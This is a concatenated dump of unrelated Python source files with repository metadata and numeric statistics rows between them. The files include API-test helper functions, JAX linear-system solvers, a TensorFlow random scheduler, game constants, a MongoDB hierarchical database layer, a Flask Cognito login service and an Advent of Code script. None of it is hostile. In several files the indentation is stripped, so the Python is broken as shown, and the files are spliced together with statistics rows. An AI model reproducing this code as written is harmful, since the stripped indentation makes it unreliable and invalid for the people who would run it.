def get_sign(*args):
content = ''.join(args).encode('ascii')
sign_key = SECRET_KEY.encode('ascii')
sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
return sign
get_sign_lambda = lambda *args: hmac.new(
'DebugTalk'.encode('ascii'),
''.join(args).encode('ascii'),
hashlib.sha1).hexdigest()
def gen_md5(*args):
return hashlib.md5("".join(args).encode('utf-8')).hexdigest()
def sum_status_code(status_code, expect_sum):
""" sum status code digits
e.g. 400 => 4, 201 => 3
"""
sum_value = 0
for digit in str(status_code):
sum_value += int(digit)
assert sum_value == expect_sum
os.environ["TEST_ENV"] = "PRODUCTION"
def skip_test_in_production_env():
""" skip this test in production environment
"""
return os.environ["TEST_ENV"] == "PRODUCTION"
def gen_app_version():
return [
{"app_version": "2.8.5"},
{"app_version": "2.8.6"}
]
def get_account():
return [
{"username": "user1", "password": "111111"},
{"username": "user2", "password": "222222"}
]
| 22.460317 | 65 | 0.639576 | 189 | 1,415 | 4.613757 | 0.428571 | 0.050459 | 0.048165 | 0.043578 | 0.066514 | 0.066514 | 0 | 0 | 0 | 0 | 0 | 0.041256 | 0.212014 | 1,415 | 62 | 66 | 22.822581 | 0.740807 | 0.065018 | 0 | 0.043478 | 0 | 0 | 0.143408 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 1 | 0.130435 | false | 0.043478 | 0.195652 | 0.065217 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6806ca0ceffb62909223de20352910ab5f4bed2b | 5,677 | py | Python | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linear system solvers."""
from typing import Any
from typing import Callable
from typing import Optional
import jax
import jax.numpy as jnp
from jaxopt._src.tree_util import tree_add_scalar_mul
def _materialize_array(matvec, shape, dtype=None):
"""Materializes the matrix A used in matvec(x) = Ax."""
x = jnp.zeros(shape, dtype)
return jax.jacfwd(matvec)(x)
def _make_ridge_matvec(matvec: Callable, ridge: float = 0.0):
def ridge_matvec(v: Any) -> Any:
return tree_add_scalar_mul(matvec(v), ridge, v)
return ridge_matvec
def solve_lu(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:
"""Solves ``A x = b`` using ``jax.lax.solve``.
This solver is based on an LU decomposition.
It will materialize the matrix ``A`` in memory.
Args:
matvec: product between ``A`` and a vector.
b: array.
Returns:
array with same structure as ``b``.
"""
if len(b.shape) == 0:
return b / _materialize_array(matvec, b.shape)
elif len(b.shape) == 1:
A = _materialize_array(matvec, b.shape, b.dtype)
return jax.numpy.linalg.solve(A, b)
elif len(b.shape) == 2:
A = _materialize_array(matvec, b.shape, b.dtype) # 4d array (tensor)
A = A.reshape(-1, b.shape[0] * b.shape[1]) # 2d array (matrix)
return jax.numpy.linalg.solve(A, b.ravel()).reshape(*b.shape)
else:
raise NotImplementedError
def solve_cholesky(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:
"""Solves ``A x = b``, using Cholesky decomposition.
It will materialize the matrix ``A`` in memory.
Args:
matvec: product between positive definite matrix ``A`` and a vector.
b: array.
Returns:
array with same structure as ``b``.
"""
if len(b.shape) == 0:
return b / _materialize_array(matvec, b.shape)
elif len(b.shape) == 1:
A = _materialize_array(matvec, b.shape)
return jax.scipy.linalg.solve(A, b, sym_pos=True)
elif len(b.shape) == 2:
A = _materialize_array(matvec, b.shape)
return jax.scipy.linalg.solve(A, b.ravel(), sym_pos=True).reshape(*b.shape)
else:
raise NotImplementedError
def solve_cg(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
init: Optional[Any] = None,
**kwargs) -> Any:
"""Solves ``A x = b`` using conjugate gradient.
It assumes that ``A`` is a Hermitian, positive definite matrix.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
init: optional initialization to be used by conjugate gradient.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.cg(matvec, b, x0=init, **kwargs)[0]
def _rmatvec(matvec, x):
"""Computes A^T x, from matvec(x) = A x, where A is square."""
transpose = jax.linear_transpose(matvec, x)
return transpose(x)[0]
def _normal_matvec(matvec, x):
"""Computes A^T A x from matvec(x) = A x, where A is square."""
matvec_x, vjp = jax.vjp(matvec, x)
return vjp(matvec_x)[0]
def solve_normal_cg(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
**kwargs) -> Any:
"""Solves the normal equation ``A^T A x = A^T b`` using conjugate gradient.
This can be used to solve Ax=b using conjugate gradient when A is not
hermitian, positive definite.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
def _matvec(x):
"""Computes A^T A x."""
return _normal_matvec(matvec, x)
if ridge is not None:
_matvec = _make_ridge_matvec(_matvec, ridge=ridge)
Ab = _rmatvec(matvec, b)
return jax.scipy.sparse.linalg.cg(_matvec, Ab, **kwargs)[0]
def solve_gmres(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
tol: float = 1e-5,
**kwargs) -> Any:
"""Solves ``A x = b`` using gmres.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.gmres(matvec, b, tol=tol, **kwargs)[0]
def solve_bicgstab(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
**kwargs) -> Any:
"""Solves ``A x = b`` using bicgstab.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.bicgstab(matvec, b, **kwargs)[0]
| 29.414508 | 80 | 0.6551 | 814 | 5,677 | 4.493857 | 0.213759 | 0.026244 | 0.0421 | 0.039366 | 0.579552 | 0.572171 | 0.572171 | 0.529524 | 0.47895 | 0.466922 | 0 | 0.006814 | 0.224414 | 5,677 | 192 | 81 | 29.567708 | 0.823984 | 0.445482 | 0 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.08 | 0.013333 | 0.453333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68075b32246e32044e505785091c503b9148dc65 | 4,023 | py | Python | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | 2 | 2021-12-26T02:40:19.000Z | 2022-01-14T05:44:48.000Z | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | null | null | null | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | null | null | null | """
The :mod:`mps.solvers._random_solver` module defines random solver.
Note: Random solver return best schedule from pre-defined search space decided
based on parameter `best_out_of`.
"""
import functools
import tensorflow as tf
import tensorflow_probability as tfp
from msp.utils import MSPEnv
from msp.utils.objective import compute_makespan
class RandomSolver(tf.Module):
def __init__(self, best_out_of=100, seed=None, **kwargs):
super(RandomSolver, self).__init__(**kwargs)
self.msp_env = MSPEnv()
self.best_out_of = best_out_of
self.seed = seed
self.is_build = False
if seed:
self.rand_gen = tf.random.experimental.Generator.from_seed(seed, alg="philox")
else:
self.rand_gen = tf.random.Generator.from_non_deterministic_state()
def build(self, input_shape):
batch_size, num_node, num_node = input_shape.adj_matrix
self.best_schedules = tf.Variable(
initial_value=tf.zeros((batch_size, num_node, 2), dtype=tf.int64),
trainable=False)
self.best_makespans = tf.Variable(
initial_value=tf.constant(1e10, shape=(batch_size,1)),
trainable=False)
self.msp_env.build(input_shape)
self.is_build = True
def __call__(self, inputs):
# Create variables on first call.
if not self.is_build:
self.build(inputs.shape)
# reintialize variables on each call.
self.reset(inputs.shape)
for _ in range(self.best_out_of):
# randomly generates schedules
schedules, makespans = self._gen_rand_schedules(inputs)
# update best schedule and makespan
self.update(schedules, makespans)
return self.best_schedules, self.best_makespans
def reset(self, input_shape):
batch_size, num_node, num_node = input_shape.adj_matrix
best_schedules_shape = (batch_size, num_node, 2)
best_makespans_shape = (batch_size, 1)
self.best_schedules.assign(
tf.zeros(best_schedules_shape, dtype=self.best_schedules.dtype))
self.best_makespans.assign(
tf.constant(1e10, shape=best_makespans_shape, dtype=self.best_makespans.dtype))
def update(self, schedules, makespans):
self.best_schedules.assign(
tf.where(
tf.less(makespans, self.best_makespans)[:,:,tf.newaxis],
schedules,
self.best_schedules
))
self.best_makespans.assign(
tf.where(
tf.less(makespans, self.best_makespans),
makespans,
self.best_makespans
))
@tf.function
def _gen_rand_schedules(self, inputs):
"""Generates a random schedule for a given input."""
schedules = tf.TensorArray(tf.int64, size=0, dynamic_size=True)
time_step = self.msp_env.reset()
step = 0
while not time_step.is_last():
selected_node = self._select_node(time_step.mask)
actions = {'inputs': inputs, 'selected_node': selected_node}
time_step = self.msp_env.step(actions)
schedules = schedules.write(step, tf.stack([selected_node, time_step.mrg_machine], axis=-1))
step += 1
# TensorArray --> Tensor
schedules = tf.transpose(schedules.stack(), perm=[1,0,2,3])
schedules = tf.squeeze(schedules)
# B x V x 2
schedules = tf.concat(schedules, axis=1)
return schedules, compute_makespan(inputs, schedules)
def _select_node(self, mask):
"""Randomly select a node based on mask."""
rand_logits = self.rand_gen.normal(mask.shape) + mask
rand_probs = tf.nn.softmax(rand_logits, axis=-1)
dist = tfp.distributions.Categorical(probs=rand_probs, dtype=tf.int64)
selected_node = tf.squeeze(dist.sample(1, seed=self.seed), axis=0)
return selected_node
| 36.908257 | 104 | 0.633607 | 497 | 4,023 | 4.901408 | 0.28169 | 0.055829 | 0.055829 | 0.026273 | 0.216749 | 0.110837 | 0.082923 | 0.082923 | 0.082923 | 0.045977 | 0 | 0.010888 | 0.269451 | 4,023 | 109 | 105 | 36.908257 | 0.817965 | 0.107631 | 0 | 0.157895 | 0 | 0 | 0.007007 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092105 | false | 0 | 0.065789 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680a6737d084b2f058e0fb395e8f516c4aaa0aea | 1,714 | py | Python | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | """
This module defines constent constant values.
"""
# quest dependencies
DEPENDENCY_NONE = ""
DEPENDENCY_QUEST_CAN_PROVIDE = "CAN_PROVIDE"
DEPENDENCY_QUEST_ACCEPTED = "ACCEPTED"
DEPENDENCY_QUEST_NOT_ACCEPTED = "NOT_ACCEPTED"
DEPENDENCY_QUEST_IN_PROGRESS = "IN_PROGRESS"
DEPENDENCY_QUEST_NOT_IN_PROGRESS = "NOT_IN_PROGRESS"
DEPENDENCY_QUEST_ACCOMPLISHED = "ACCOMPLISHED" # quest accomplished
DEPENDENCY_QUEST_NOT_ACCOMPLISHED = "NOT_ACCOMPLISHED" # quest accepted but not accomplished
DEPENDENCY_QUEST_COMPLETED = "COMPLETED" # quest complete
DEPENDENCY_QUEST_NOT_COMPLETED = "NOT_COMPLETED" # quest accepted but not complete
# quest objective types
OBJECTIVE_NONE = ""
OBJECTIVE_TALK = "OBJECTIVE_TALK" # finish a dialogue, object: dialogue_id
OBJECTIVE_ARRIVE = "OBJECTIVE_ARRIVE" # arrive a room, object: room_id
OBJECTIVE_OBJECT = "OBJECTIVE_OBJECT" # get some objects, object: object_id
OBJECTIVE_KILL = "OBJECTIVE_KILL" # kill some characters, object: character_id
# event trigger types
EVENT_TRIGGER_NONE = 0
EVENT_TRIGGER_ARRIVE = "EVENT_TRIGGER_ARRIVE" # at attriving a room. object: room_id
EVENT_TRIGGER_KILL = "EVENT_TRIGGER_KILL" # caller kills one. object: dead_one_id
EVENT_TRIGGER_DIE = "EVENT_TRIGGER_DIE" # caller die. object: killer_id
EVENT_TRIGGER_TRAVERSE = "EVENT_TRIGGER_TRAVERSE" # before traverse an exit. object: exit_id
EVENT_TRIGGER_ACTION = "EVENT_TRIGGER_ACTION" # called when a character act to an object
# event types
EVENT_NONE = ""
EVENT_ATTACK = "EVENT_ATTACK" # event to begin a combat
EVENT_DIALOGUE = "EVENT_DIALOGUE" # event to begin a dialogue
| 47.611111 | 94 | 0.753792 | 212 | 1,714 | 5.726415 | 0.278302 | 0.118616 | 0.057661 | 0.041186 | 0.028007 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000712 | 0.180863 | 1,714 | 35 | 95 | 48.971429 | 0.86396 | 0.354142 | 0 | 0 | 0 | 0 | 0.26827 | 0.020352 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680b6cd878f9ea3ef233e78c3581a9213fd0cb7b | 7,450 | py | Python | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | """
BranchDB - A Multilevel Database
A layer for MongoDB that behaves as a multilevel/hierarchical database
Author: Daniel P. Stuart
This software is licensed under Apache License 2.0
"""
import pymongo
import json
from bson.objectid import ObjectId
import re
import itertools
# MongoDB Connection
class connect():
def __init__(self, server, name):
print("Initializing client...")
client = pymongo.MongoClient(server)
client.admin.command('ismaster')
if not(name in client.database_names()):
print("Creating %s database..." % name)
self.db = client[name]
if not(self.__collectionExists("/")) or not(self.__collectionExists("index")):
print("Creating root and index collections...")
self.__createCollection("/")
self.__createCollection("index")
print("Client ready!\n")
# Collection Functions
def __getCollections(self):
return self.db.collection_names()
def __collectionExists(self, collection):
if collection in self.__getCollections():
return True
return False
def __createCollection(self, collection):
self.db.create_collection(collection)
def __readCollection(self, collection):
return list(self.db[collection].find({}))
def __deleteCollection(self, collection):
if collection in ["index","/"]:
raise PermissionError("%s can't be deleted!" % collection)
if not(self.__collectionExists(collection)):
raise FileNotFoundError("%s doesn't exist!" % collection)
if self.isAncestor(collection):
raise FileExistsError("%s has descendants!" % collection)
self.db[collection].drop()
def __pathToCollection(self, path):
if path != "index" and path != "/":
if path.endswith("/"):
path = path[:-1]
ret = list(self.db["index"].find({"path": path}).limit(1))
if len(ret) == 1:
return str(ret[0]["_id"])
raise FileNotFoundError("Path %s doesn't exist!" % path)
return path
# Object Functions
def createObject(self, value, path):
collection = self.__pathToCollection(path)
return self.__createObject(value, collection)
def __createObject(self, value, collection):
if isinstance(value, str):
value = json.loads(value)
insert = self.db[collection].insert_one(value)
return str(insert.inserted_id)
def readObject(self, obj_id, path):
collection = self.__pathToCollection(path)
return self.__readObject(obj_id, collection)
def __readObject(self, obj_id, collection):
id = {}
id["_id"] = ObjectId(obj_id)
ret = list(self.db[collection].find(id).limit(1))
if len(ret) == 1:
return ret[0]
raise FileNotFoundError(obj_id + " at " + collection + " doesn't exist!")
def updateObject(self, value, obj_id, path):
collection = self.__pathToCollection(path)
self.__updateObject(value, obj_id, collection)
def __updateObject(self, value, obj_id, collection):
if collection == "index":
raise PermissionError("Index can't have its objects updated!")
id = {}
id["_id"] = ObjectId(obj_id)
changes = {}
if isinstance(value, str):
changes["$set"] = json.loads(value)
else:
changes["$set"] = value
self.db[collection].update(id,changes)
def deleteObject(self, obj_id, path):
collection = self.__pathToCollection(path)
self.__deleteObject(obj_id, collection)
def __deleteObject(self, obj_id, collection):
if not(self.__objectExists(obj_id, collection)):
raise FileNotFoundError(obj_id + " at " + collection + " doesn't exist!")
if collection != "index" and self.hasPath(obj_id, collection):
raise FileExistsError(obj_id + " at " + collection + " has a path!")
id = {}
id["_id"] = ObjectId(obj_id)
self.db[collection].remove(id, True)
def getObjects(self, path):
if path == "/":
collection = path
else:
collection = self.__getChild(path)
if collection == None:
return []
return self.__readCollection(collection)
def objectExists(self, value, path):
collection = self.__pathToCollection(path)
return self.__objectExists(value, collection)
def __objectExists(self, value, collection):
if isinstance(value, str):
if ObjectId.is_valid(value):
value = {"_id": ObjectId(value)}
else:
value = json.loads(value)
return bool(self.db[collection].count_documents(value, limit = 1))
def searchObject(self, value, path):
collection = self.__pathToCollection(path)
return self.__searchObject(value, collection)
def __searchObject(self, value, collection):
if collection == "index":
raise PermissionError("Index isn't searchable!")
if isinstance(value, str):
value = json.loads(value)
ret = list(self.db[collection].find(value).limit(1))
if len(ret) == 1:
return ret[0]
return None
# Index Functions
def getPath(self, obj_id, path):
if not(path.endswith("/")):
path += "/"
return (path + obj_id)
def __getPath(self, collection):
if collection == "/":
return collection
parent = self.__readObject(collection, "index")
return parent["path"]
def hasPath(self, obj_id, path):
value = {}
if not(path.endswith("/")):
path += "/"
value["path"] = path + obj_id
return self.__objectExists(value, "index")
def isAncestor(self, obj_id, path=None):
if path == None and self.__collectionExists(obj_id):
path = self.__getPath(obj_id)
else:
path = self.__getChild(obj_id, path)
if path == None:
return False
path = self.__getPath(path)
path += "/"
path = path.replace("/", "\/")
value = {"path": {"$regex": path}}
return self.__objectExists(value, "index")
def createPath(self, obj_id, path):
value = {}
if not(path.endswith("/")):
path += "/"
value["path"] = path + obj_id
if self.__objectExists(value, "index"):
raise FileExistsError("%s already has a child!" % value["path"])
id = self.__createObject(value, "index")
self.__createCollection(str(id))
return value["path"]
def __getChild(self, obj_id, path=""):
if path == "":
path = obj_id
else:
if not(path.endswith("/")):
path += "/"
path += obj_id
search = {}
search["path"] = path
ret = list(self.db["index"].find(search).limit(1))
if len(ret) == 1:
return str(ret[0]["_id"])
return None
def getChildren(self, obj_id, path):
collection = self.__getChild(obj_id, path)
if collection == None:
return []
return self.__readCollection(collection)
def deletePath(self, obj_id, path):
child = self.__getChild(obj_id, path)
if child == None:
raise FileNotFoundError(obj_id + " at " + path + " doesn't have a child!")
if self.isAncestor(child):
raise FileExistsError(obj_id + " at " + path + " has descendants!")
self.__deleteCollection(child)
self.__deleteObject(child, "index")
def getStructure(self, path="/"):
if not(path.endswith("/")):
path += "/"
regex = path.replace("/", "\/")
regex = regex + ".*"
value = {"path": {"$regex": regex}}
objects = self.db["index"].distinct("path", value)
if objects:
objects.sort(key=len)
objects = [list(obj) for (i, obj) in itertools.groupby(objects, key=len)]
def createStructure(objects, regex=""):
if regex != "":
regex = re.compile(regex)
objects[0] = list(filter(regex.match, objects[0]))
if not(objects[0]):
return None
ret = {}
separator = len(objects[0][0]) - 24
if len(objects) == 1:
for obj in objects[0]:
ret[obj[separator:]] = None
return ret
for obj in objects[0]:
ret[obj[separator:]] = createStructure(objects[1:], obj)
return ret
return createStructure(objects)
return {} | 27.289377 | 80 | 0.676779 | 937 | 7,450 | 5.217716 | 0.163287 | 0.036817 | 0.025772 | 0.023931 | 0.376355 | 0.305175 | 0.220495 | 0.185314 | 0.12702 | 0.061362 | 0 | 0.004386 | 0.173691 | 7,450 | 273 | 81 | 27.289377 | 0.789799 | 0.034362 | 0 | 0.326923 | 0 | 0 | 0.076977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144231 | false | 0 | 0.024038 | 0.009615 | 0.331731 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6813a3ec63771ea2d7bc06478e9de5267ace0581 | 3,510 | py | Python | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | 2 | 2022-03-24T16:07:55.000Z | 2022-03-24T19:54:51.000Z | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | 1 | 2022-03-30T14:27:27.000Z | 2022-03-30T14:27:27.000Z | src/flask_cognito_lib/services/cognito_svc.py | mblackgeo/flask-cognito-lib | 4a58b5da33f67c77a0b16764b19761623368a04a | [
"MIT"
] | null | null | null | from typing import List, Optional
from urllib.parse import quote
import requests
from flask_cognito_lib.config import Config
from flask_cognito_lib.exceptions import CognitoError
from flask_cognito_lib.utils import CognitoTokenResponse
class CognitoService:
def __init__(
self,
cfg: Config,
):
self.cfg = cfg
def get_sign_in_url(
self,
code_challenge: str,
state: str,
nonce: str,
scopes: Optional[List[str]] = None,
) -> str:
"""Generate a sign URL against the AUTHORIZE endpoint
Parameters
----------
code_challenge : str
A SHA256 hash of the code verifier used for this request.
Note only S256 is support by AWS Cognito.
state : str
A random state string used for to prevent cross site request forgery
nonce : str
A random state string used for to prevent replay attacks
scopes : Optional[List[str]]
An optional list of system-reserved scopes or custom scopes that
are associated with a client that can be requested.
If the client doesn't request any scopes, the authentication server
uses all scopes that are associated with the client.
Returns
-------
str
A front channel login URL for the AWS Cognito AUTHORIZE endpoint
"""
quoted_redirect_url = quote(self.cfg.redirect_url)
full_url = (
f"{self.cfg.authorize_endpoint}"
f"?response_type=code"
f"&client_id={self.cfg.user_pool_client_id}"
f"&redirect_uri={quoted_redirect_url}"
f"&state={state}"
f"&nonce={nonce}"
f"&code_challenge={code_challenge}"
"&code_challenge_method=S256"
)
if scopes is not None:
full_url += f"&scope={'+'.join(scopes)}"
return full_url
def exchange_code_for_token(
self,
code: str,
code_verifier: str,
) -> CognitoTokenResponse:
"""Exchange a short lived authorisation code for an access token
Parameters
----------
code : str
The authorisation code after the user has logged in at the Cognito UI
code_verifier : str
The plaintext code verification secret used as the code challenge
when logging in
Returns
-------
CognitoTokenResponse
A dataclass that holds the token response from Cognito
Raises
------
CognitoError
If the request to the endpoint fails
If the endpoint returns an error code
"""
data = {
"grant_type": "authorization_code",
"client_id": self.cfg.user_pool_client_id,
"redirect_uri": self.cfg.redirect_url,
"code": code,
"code_verifier": code_verifier,
}
try:
response = requests.post(
url=self.cfg.token_endpoint,
data=data,
auth=(self.cfg.user_pool_client_id, self.cfg.user_pool_client_secret),
)
response_json = response.json()
except requests.exceptions.RequestException as e:
raise CognitoError(str(e)) from e
if "error" in response_json:
raise CognitoError(f"Cognito error : {response_json['error']}")
return CognitoTokenResponse(**response_json)
| 30.789474 | 86 | 0.590598 | 402 | 3,510 | 5.007463 | 0.343284 | 0.034774 | 0.021858 | 0.029806 | 0.116244 | 0.089419 | 0.081967 | 0.067561 | 0.036761 | 0 | 0 | 0.003859 | 0.335613 | 3,510 | 113 | 87 | 31.061947 | 0.859348 | 0.347863 | 0 | 0.052632 | 0 | 0 | 0.174547 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6814085ba3b5101a43dc38552f50112c1c0c2e6a | 416 | py | Python | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | 1 | 2021-07-20T12:59:09.000Z | 2021-07-20T12:59:09.000Z | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | 11 | 2021-03-17T20:27:27.000Z | 2021-04-07T16:22:55.000Z | tests/integration/test_shortcuts.py | ghga-de/datameta-client | f7900027af9d7d1eff23594de79e90e75baa123a | [
"Apache-2.0"
] | null | null | null | from datameta_client import shortcuts
from . import fixtures
from .utils import id_in_response
def test_prevalidate_and_submission():
metadataset_record = fixtures.replace_ID(fixtures.metadataset_record)
response = shortcuts.stage_and_submit(
metadatasets_json=metadataset_record,
files_dir=fixtures.base_dir,
label="test"
)
assert id_in_response(response, has_site_id=True) | 32 | 73 | 0.774038 | 52 | 416 | 5.826923 | 0.576923 | 0.168317 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163462 | 416 | 13 | 74 | 32 | 0.87069 | 0 | 0 | 0 | 0 | 0 | 0.009592 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6814a822d48a5aa8b28083b4ee3d22dfd048a7ac | 1,468 | py | Python | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | 4 | 2019-12-03T02:03:23.000Z | 2019-12-20T11:36:00.000Z | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | null | null | null | 2016/day10/part2.py | ceronman/AdventOfCode2015 | 87b6d93df960045b5eff1ded107ac4e2719ee6e6 | [
"MIT"
] | null | null | null | import re
# input_lines = '''\
# value 5 goes to bot 2
# bot 2 gives low to bot 1 and high to bot 0
# value 3 goes to bot 1
# bot 1 gives low to output 1 and high to bot 0
# bot 0 gives low to output 2 and high to output 0
# value 2 goes to bot 2'''.splitlines()
input_lines = open('input.txt')
holders = {
'bot': {},
'output': {}
}
give_commands = {}
for line in input_lines:
match = re.match((r'value (\d+) goes to bot (\d+)'), line)
if match:
value, bot_nr = match.groups()
holders['bot'].setdefault(bot_nr, []).append(value)
continue
match = re.match(r'bot (\d+) gives low to (bot|output) '
r'(\d+) and high to (bot|output) (\d+)', line)
if match:
source, low_kind, low_nr, high_kind, high_nr = match.groups()
give_commands[source] = (low_kind, low_nr, high_kind, high_nr)
ready = [h for h in holders['bot'] if len(holders['bot'][h]) == 2 ]
while ready:
for bot_nr in ready:
low_value, high_value = sorted(holders['bot'][bot_nr], key=int)
low_kind, low_nr, high_kind, high_nr = give_commands[bot_nr]
holders[low_kind].setdefault(low_nr, []).append(low_value)
holders[high_kind].setdefault(high_nr, []).append(high_value)
del holders['bot'][bot_nr]
ready = [h for h in holders['bot'] if len(holders['bot'][h]) == 2 ]
values = [ int(holders['output'][str(i)][0]) for i in range(3) ]
